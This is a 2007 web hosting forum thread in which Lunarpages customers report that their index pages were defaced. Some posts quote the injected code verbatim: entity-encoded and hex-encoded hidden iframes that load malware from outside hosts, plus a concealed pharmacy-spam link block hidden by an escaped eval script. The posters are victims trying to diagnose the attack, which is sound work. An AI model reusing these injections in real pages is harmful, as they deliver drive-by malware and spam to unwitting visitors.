Lunarpages Web Hosting Forum

Author Topic: Security Issue with Multiple Hosting Accounts (8/28/2007 - 9/14/2007)  (Read 21767 times)

Offline Pamiam

  • Newbie
  • *
  • Posts: 2
<script> appended to every index.* « 1 2 »
« Reply #15 on: August 31, 2007, 07:54:35 AM »


That exact same thing happened to BOTH of my Lunarpages sites, and they were completely disabled. One site is my own, but my client on the other one is not pleased.  :(

For all of the hoops that lunarpages makes their customers jump through on security, this kind of thing still happens. I am not pleased, either.  :(


Offline scanman20

  • Senior Moderator
  • Über Jedi
  • *****
  • Posts: 1556
    • http://www.notonebit.com
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #16 on: August 31, 2007, 08:42:52 AM »
I experienced the iframe hack on my sites about a week ago. Fortunately I was able to restore from my own backup. I would really like it if LP could analyze the server logs and try to determine exactly what happened. If nothing else I would at least like to learn from this experience. I find it interesting that i have been with LP for nearly five years and the one time I get hacked it appears to be spread across many LP customers which leads me to believe that the problem is at a level higher than one user's account.
Even a broken clock is right twice a day.
NotOneBit.com
MCSE - MCSA - MCP (<- unused since 2006!)

Offline farreachfarm

  • Newbie
  • *
  • Posts: 5
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #17 on: August 31, 2007, 07:31:29 PM »
I see instructions for accessing raw log files in CPanel... how is this done in Plesk?  The logs files for the day my site was defaced are missing.

Offline farreachfarm

  • Newbie
  • *
  • Posts: 5
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #18 on: August 31, 2007, 07:51:47 PM »
WHAT IS GOING ON HERE!!!!!????

My site was defaced again today (8/31/07)
This was added to my index.aspx (windows hosted site):

<!-- ~ --><iframe src="&#104&#116&#116&#112&#58&#47&#47&#119&#97&#116&#99&#104&#55&#55&#46&#99&#111&#109&#47&#116&#100&#115&#47&#120&#100&#115&#47&#105&#102&#114&#97&#109&#101&#46&#112&#104&#112" width="0" height="0" style="display:none"></iframe><!-- ~ -->

Watch77, google counters... oh my!  Twice in a few days.

My webpage is super simple, just a place holder.  No scripts no nothing.  THis is scary.

Appears to vector through "Global Net Access, LLC " IP address: 207.210.111.162

How do you block IP Addresses using Plesk?  I see instructions in the threads for CPanel.


Offline SteveW

  • Master Jedi
  • *****
  • Posts: 1392
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #19 on: September 01, 2007, 01:41:34 AM »
How do you block IP Addresses using Plesk?  I see instructions in the threads for CPanel.
If there's nothing here in the forum try http://www.swsoft.com/plesk/, at the documentation link (PDF downloads). That might have something.

Offline pkchukiss

  • Newbie
  • *
  • Posts: 1
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #20 on: September 02, 2007, 05:33:02 PM »
Have you changed your passwords after the first attempt?

Offline JJ

  • Trekkie
  • **
  • Posts: 18
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #21 on: September 03, 2007, 10:58:17 AM »
This has happened to both my web accounts serveral times now and I am getting very frustrated.

Can someone help me out with a couple of questions;

(1) "How" are the hackers able to do this? How can they update my index.php and login.php pages unless they know the passwords? if they know my passwords then I would have expected more damage.

(2) How on earth can I stop them from doing this again?!

To that end I have shut both websites down, well to be exact, I have password protected all directories which I assume will stop any attacks until I find the permanent fix?
« Last Edit: September 03, 2007, 11:11:03 AM by JJ »

Offline Peak

  • Spacescooter Operator
  • *****
  • Posts: 44
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #22 on: September 03, 2007, 11:57:28 AM »
Is there anyone more with a dedicated website who has been defaced? Right now, I'm rather annoyed that IPB has a million index.html and index.php-files.

According to my logs (what little I have succeeded in deducing), the changes was uploaded through ftp. Apparently I've been hacked twice. The first one, I didn't notice. I saw that my recent backups had the iframes in them. The second one broke one of my IPB-forums today, which made even me take notice.

I sent a ticket to LP for over 12 hours ago, but haven't heard anything back. I would like to know if they did something else. I would hate to be a spam relay or something like that suddenly. I changed my passwords to the ftp, but who know what else they did except changing the index-files...

One other thing: What does that script do? I or my users haven't noticed a thing recently. No trojan downloads or anything like that...

//Peak

Offline JeremyD

  • SleePy...
  • Jabba the Hutt
  • *****
  • Posts: 733
  • SMF Team Member
    • LcT Tribe
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #23 on: September 03, 2007, 01:38:09 PM »
Well if you got hacked via a FTP account, I would assume it is one you created and now your cpanel one? Since these are not bugged by lunarpages own passwords that force random good passwords, You are most likely to put an easy password in there.
I would suggest using the same harder to guess passwords you do for your cpanel as with FTP. They are hard to remember at first. But I have gotten to where I can change my passwords and have it memorized in only 2 days. :yep:

JJ, These are just random attacks from scripts. Rarely do this actually come from a human anymore these days.
To help stop this you should have long hard to guess random passwords. There are many random password generators out there and I have even built one myself that I use for my random passwords (It is very good at giving a random password).

Offline Peak

  • Spacescooter Operator
  • *****
  • Posts: 44
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #24 on: September 03, 2007, 01:40:57 PM »
My passwords aren't so easy to figure out (numbers and stuff). Got an answer from support now anyway. And both of them?

Don't have CPanel, only Webmin...

//Peak

Offline farreachfarm

  • Newbie
  • *
  • Posts: 5
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #25 on: September 03, 2007, 07:40:22 PM »
I AM REALLY GETTING TIRED OF THIS.  This is the 3rd time that watch77 has been added to my index.aspx  In fact this time it replaced my index.aspx entirely with:

<!-- ~ --><iframe src="&#104&#116&#116&#112&#58&#47&#47&#119&#97&#116&#99&#104&#55&#55&#46&#99&#111&#109&#47&#116&#100&#115&#47&#120&#100&#115&#47&#105&#102&#114&#97&#109&#101&#46&#112&#104&#112" width="0" height="0" style="display:none"></iframe><!-- ~ -->

This attempts to install a downloader...

I have a dedicated IP address:  An anonymous FTP, NO Scripts, everything is password protected.  Lunarpages keeps saying "we are investigating", it's been many days and I see no indication that they found the hole.

Anyone have a clue how these hackers are getting in?

--Scott

Offline farreachfarm

  • Newbie
  • *
  • Posts: 5
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #26 on: September 03, 2007, 08:20:35 PM »
I see from my logs that this script is being run --> http://www.filesdatabase.com/azenv.php from  60.212.81.102 (Asia Pacific blah blah... in AU).  I'm not sure I understand this, I'm not an IT guy just a poor fool that wants a simple webpage... but from what I've read it can be used as way for a local browser to discover open ports on an IP...  perhaps there are open ports on LP that they don't know about?

Note: I've changed my passwords a couple of times since this happened.

Again this is all new to me, and frankly I shouldn't have to worry about it.  I *was* going to have eCommerce added to my site eventually, but now I think that's out of the question.

I have a expert IT friend at AMD (the uCPU chip maker) that will take a look, I'll let you know what he finds.

Also thanks for telling me about the plesk usage document.

--Scott


Offline aiko

  • Spaceship Captain
  • *****
  • Posts: 122
Re: Question for LP admins re: recent site defacements
« Reply #28 on: September 04, 2007, 07:33:04 AM »
I think that Lunarpages should seriously consider some sort of alert system that would e-mail webmasters when their website has been compromised.

I agree.

+ their websites will be automatically removed from the google directory very soon.

Aiko
« Last Edit: September 04, 2007, 07:46:00 AM by aiko »

Offline aiko

  • Spaceship Captain
  • *****
  • Posts: 122
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #29 on: September 04, 2007, 07:48:02 AM »
VERY IMPORTANT: PLEASE CHECK YOUR WEBSITES FOR DEFACEMENT BY HACKERS.

I host MANY websites with LP. Yesterday (8/27/2007) and this morning (8/28/2007) I had started receiving customer complaints that when they went to their sites, their anti-virus software alerted them that their sites were Trojan infected and many were blocked from seeing their sites. I would say that at least 20 or 30 of my clients are affected, all spread out on different LP servers (and yes, all sites have DIFFERENT FTP logins and passwords). There's nothing common among the sites - most of the sites are simple HTML pages - not scripts like forums, cms, or anything that would indicate a common pattern.

So, I went to investigate, and sure enough - all files names index.html or index.php, default.html or .php, home.html or .php (and in some cases login.php) have the following inserted in their body tags (or in case of php script, this was inserted on the bottom of the script). Not just the main directory, but all subdirectories that have index files have been affected as well. All files appear to be dated yesterday or today.

Here's how this defacing looks like:

Code: [Select]
<body topmargin="0" leftmargin="0" marginheight="0" marginwidth="0" bgcolor="#FFFFFF"><script>function v46d362555ac36(v46d362555b403){  return(parseInt(v46d362555b403,16));}function v46d362555cb88(v46d362555d354){  var v46d362555db26='';for(v46d362555e59a=0; v46d362555e59a<v46d362555d354.length; v46d362555e59a+=2){ v46d362555db26+=(String.fromCharCode(v46d362555ac36(v46d362555d354.substr(v46d362555e59a, 2))));}return v46d362555db26;} document.write(v46d362555cb88('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6231207372633D5C27687474703A2F2F35382E36352E3233352E3135332F7E706F7A69746976652F6963652F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3931313534292B2766375C272077696474683D333833206865696768743D323338207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
So far, I have noticed the defacing on the following servers where SOME of my sites are hosted.

viola
atlas
stellar
sabik
danzig
savartos
hathor
prospero
naos
helium
mirach
galatea
centaur
angular
valkanos
omicron
aquarius

and counting... (I am discovering more and more as I try to fix my websites today and also change all FTP passwords - WHAT A PAIN!):



It also happened on LP dedicated servers.

I found another one today!

Code: [Select]
<div id="divId"><a href="http://dev.eurac.edu:8080/images/pps.gif/1/1/phentemine.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/1/phenteramine.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/1/phentermene.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/2/10-hydrocodone-lortab.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/2/357-hydrocodone.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/3/buy-viagra-in-ireland.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/3/buy-viagra-no-prescription.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/3/buy-viagra-pills.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/4/vicodin-online-canada.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/4/vicodin-online-prescriptions.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/5/xanax-no-prescription-required.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/5/xanax-no-prescription-us-pharmacy.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/6/100-tramadol.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/6/200mg-tramadol.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/7/valium-to-buy.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/8/buy-cialis-without-prescription.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/9/adipex-p-online.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/10/buy-ephedra-product.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/11/soma-pill-pictures.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/12/buy-levitra-online.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/13/ambien-prescribing.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/14/index.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/15/propecia-price.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/17/100mg-zoloft.html"></a></div>

<script>eval(unescape("%76%61%72%20%64%69%76%45%6c%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%64%69%76%49%64%22%29%3b%64%69%76%45%6c%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%20%3d%22%6e%6f%6e%65%22%3b")); </script>

Aiko
« Last Edit: September 04, 2007, 08:29:40 AM by aiko »